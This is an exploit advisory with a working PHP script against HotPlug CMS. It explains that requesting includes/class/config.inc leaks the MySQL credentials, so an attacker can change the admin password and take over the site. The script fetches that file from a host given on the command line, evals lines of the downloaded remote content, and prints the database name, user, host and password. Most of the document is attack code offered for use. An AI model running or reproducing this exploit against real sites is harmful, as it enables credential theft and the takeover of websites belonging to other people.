Hello
HotPlug CMS Config File Include Vulnerability
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : [email protected]
After Script Url Add
includes/class/config.inc
And you will download the config file , so that you will be able to connect by remote connect program to the mysql server and change admin password and be able to control the websiteβ¦
And This is the exploit if you want :-
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* HotPlug CMS Config File Include Vulnerability exploit
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
/
print_r('
//
/ HotPlug CMS Config File Include Vul /
/ by HACKERS PAL <[email protected]> /
/ site: http://www.soqor.net /');
if ($argc<2) {
print_r('
/ β /
/ Usage: php '.$argv[0].' host /
/ Example: /
/ php '.$argv[0].' http://localhost/hot /
/*/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$url=$argv[1];
$exploit="/includes/class/config.inc";
$page=$url.$exploit;
Function get_page($url)
{
if(function_exists("file_get_contents"))
{
$contents = file_get_contents($url);
}
else
{
$fp=fopen("$url","r");
while($line=fread($fp,1024))
{
$contents=$contents.$line;
}
}
return $contents;
}
$page = get_page($page);
if(eregi("<?php",$page))
{
$lines = explode("\n",$page);
$evaled = $lines[50].$lines[51].$lines[52].$lines[53].$lines[54].$lines[55].$lines[56].$lines[58].$lines[58].$lines[59];
$evaled=str_replace("include","#include",$evaled);
eval($evaled);
Echo "\n[+] Database Name : $db_name";
Echo "\n[+] Database User : $db_user";
Echo "\n[+] Database Host : $db_host";
Echo "\n[+] Database Pass : $db_password";
Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
}
else
{
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
}
?>